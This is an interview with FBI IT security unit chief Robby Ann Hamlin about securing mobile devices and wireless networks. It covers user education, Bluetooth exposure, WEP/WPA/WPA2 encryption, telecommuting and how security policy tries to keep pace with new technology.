There is always a storm on the wireless security front. Robby Ann Hamlin's job, as unit chief in the FBI's department of IT security, is keeping those thunderheads at bay. The former federal police officer and security professional is responsible for securing the FBI's field offices and mobile agents against digital threats. She took some time to answer our questions about wireless security.
What drove you to focus on IT security?
After 2 years as a federal police officer, I aspired to be a security professional supporting all domains of security. I spent seven years as a federal employee establishing subject matter expertise in the areas of physical, personnel protection, personnel, and computer security. Through the years, it became obvious that practically all information and access controls are processed, controlled and stored within information technology equipment. Therefore, I focused on the discipline I deemed most challenging and evolving--information technology security. As we "peel the onion," taking a defense-in-depth approach to security, the layers of personnel, physical, and technical security surround the IT that stores, processes and transmits our information. Securing the technology for protection of data at rest and data in transit is where I have focused my attention for the past 10 years.
How do you secure the FBI's mobile users and field agents?
Education is our first line of defense. We have to ensure our employees are aware of technological vulnerabilities inherent within the devices they use--Bluetooth is a transmission capability in many new cell phones, PDAs and laptops and almost always enabled by default from the manufacturer. This capability renders a device vulnerable to wireless intercept--transparent to the user. In addition to the concern over compromise, removal or unavailability of our critical or sensitive information, mobile computing devices have also become the new frontier for viruses, spamming and telemarketers.
There are many security tools, capabilities and procedures available to secure information on mobile computing devices and many are evaluated and used throughout the U.S. Government for protection of "Sensitive But Unclassified" (SBU) information. However, technologies used for the protection of classified national security and intelligence information are authorized through policies and standards set forth or specific approval from the DCI, NSA, NIST, FIPS or other specific U.S. Government guidelines. The challenge for all is awaiting U.S. Government approved standards and security technologies that maintain pace with emerging technologies…virtually impossible.
The FBI is currently researching technologies that implement technical controls, such as "freezing" the baseline configuration of device, allowing user to only invoke and process what is allowed and technically preventing what is not allowed. Based on the business need and level of protection required for the information to be processed, there are products that allow relatively relaxed security within authorized work spaces, but automatically invoke very stringent security policies when accessing networks or databases when the user and device are external to authorized work spaces. This ensures the mobile computer is "locked" into a pristine, secure configuration, prohibiting user intervention or alteration, even when the device is removed from a secure work environment. In addition, we are researching technologies that provide technical access controls, encryption for data at rest and in transmission, and intrusion prevention for mobile computing devices over traditional functions that have relied on administrative (human) controls to eliminate the risk of access to the data.
What marked improvements have you seen in the security industry through the changing wireless encryption standards?
The rapid changes in the standards make it very difficult for large organizations to adopt wireless networking. Some stability would increase the chance for successful integration with existing networks. However, there are certainly existing solutions that can be engineered into systems today that provide high levels of security for the protection of our unclassified, sensitive and classified information. Because of the physical nature of the wireless media (unlicensed RF spectrum) there will always be availability issues with existing technology. We should not rely on high availability of systems operating solely in a wireless environment. Systems processing critical and/or sensitive information, when availability and reliability is of utmost importance to operations or protection of data assets, should always have a wired or hard line back-up.
What trends do you see for the mobile security industry with the increasing occurrence of employees working offsite?
This will increase significantly and has through Blackberry technology and wireless NIC cards. We have the ability to communicate anytime and anywhere in a timely, seamless manner. There's no need to be in the office anymore--unless you're working with or discussing classified information where national policy places strict requirements on the protection of that information and even this need is quickly moving into a mobile computing environment. In addition, let us not forget the portability and small (and getting smaller size) of these mobile devices making them an easy target for theft and loss.
What recommendations can you make for enterprise CSOs who are struggling with enforcing a mobile security policy?
Educate users on technologies and vulnerabilities associated with those technologies, maintain current policies, and encourage users to consider where they place critical information, where they send it and how. Like we rely on and trust our information in a sealed envelope and the U.S. Postal service to protect payment transactions, letters, etc., we also need to consider the reliability and protection of technology we use to protect the same information when transmitted electronically and stored in portable, mobile computing devices.
What's the bigger mobile security challenge--rogue devices/access points or securely configuring devices?
As technology emerges, increasing speed, convenience, ease of use to communicate, process and store our information, the vulnerabilities increase. One must think like the bad guy in order to consider all the options of accessing, corrupting, or rendering data unavailable. Examples--Bluetooth surfing in public coffee establishments or obtaining free Internet service by hopping on your neighbor's unprotected wireless home network. Because of the popularity of wireless systems, the ability to control whom one connects to is a huge challenge. Once again, technical security solutions combined with education and policies/procedures have great promise in reducing the risk of unauthorized connections rather than simply decreeing that wireless is too vulnerable, or expecting that users will obey the rules to not connect their computers through unauthorized access points or other wired networks.
Security managers are supposed to be business enablers. In that regard, do you still find yourself struggling with authorizing wireless initiatives?
Yes. National policy will likely take a more risk avoidance versus a risk managed approach due to the difficulty in creating preventive security measures against new technologies. We simply cannot keep up. Saying "No" to requests to use new technologies is not the answer. We must ask the users what are their requirements and what technologies they'd like to use and we as security professionals will work to secure it. If we can't, we consider alternatives.
Putting it into a realistic perspective, technology and eagerness to use wireless capabilities is not the problem. Gaining a genuine understanding of an organization's business needs that can best or only be served by a wireless solution seems to be the issue. In all honesty, there is some amount of "fun factor" in many requests for the use of wireless capabilities in addition to very legitimate, time and life saving critical requirements. Currently we find that when we carefully examine these requests, they are better served and more secure using wired solutions. Wireless solutions require a completely new set of logistical support and managers have a propensity to attempt to incorporate wireless and fail to properly fund the support and security requirements. This shortfall, unfortunately, often goes unnoticed until problems occur (the device or data is compromised or accessed by unauthorized users) that cause the issue to leap into the spotlight where the lack of proper security engineering and support becomes very clear.
Do enterprises underestimate the security risks associated with wireless?
Absolutely. Most enterprise security managers are unaware of all of the new technologies to know where the vulnerabilities exist. The problem arises from not having standard, U.S. Government-approved wireless projects that include security, which results in "ad hoc" solutions being placed into service that can be made to work, by well intended engineers, that have not included an adequate security solution in the initial design and engineering efforts. Security is always more expensive "after the fact."
What security improvements have you seen through the changing encryption standards?
The standards are not the issue--there are choices available today that meet security requirements. The authority/ability to select a standard, and then build around it as the corporate solution is always difficult in any large organization. Once the "standard" is established, those people who are charges with implementation will do their best to abide by the policies and directives. This also speaks to the funding for adequate support for the requirements.
WPA addresses all known vulnerabilities in WEP, the original, less secure 40 or 104-bit encryption scheme in the IEEE 802.11 standard. WPA also provides user authentication, since WEP lacks any means of authentication. Designed to secure present and future versions of IEEE 802.11 devices, WPA is a subset of the IEEE 802.11i specification.
WPA replaces WEP with a strong new encryption technology called Temporal Key Integrity Protocol (TKIP) with Message Integrity Check (MIC). It also provides a scheme of mutual authentication using either IEEE 802.1X/Extensible Authentication Protocol (EAP) authentication or pre-shared key (PSK) technology. WPA2 is based upon the Institute for Electrical and Electronics Engineers' (IEEE) 802.11i amendment to the 802.11 standard, which was ratified on July 29, 2004. The primary difference between WPA and WPA2 is that WPA2 uses a more advanced encryption technique called AES (Advanced Encryption Standard), allowing for compliance with FIPS140-2 government security requirements.
How does the increasing number of remote employees change the wireless security forecast?
It will only increase as more and more organizations support and encourage telecommuting. Our challenge is to provide secure solutions for those who will engage in remote connectivity. History has shown us that if we don't provide users with a secure (or any) solution… they will develop one for themselves, which will technically function for connectivity, but will almost certainly not be a secure solution. It is incumbent on those of us in the security field to provide these solutions to the users, before technical evolution overwhelms us with home grown solutions that give them the connectivity they need, but introduce great risk to the parent organization.
**Editor's note: Ms. Hamlin has since left the FBI for the position of Senior Vice President and CISO of PI-CORESEC.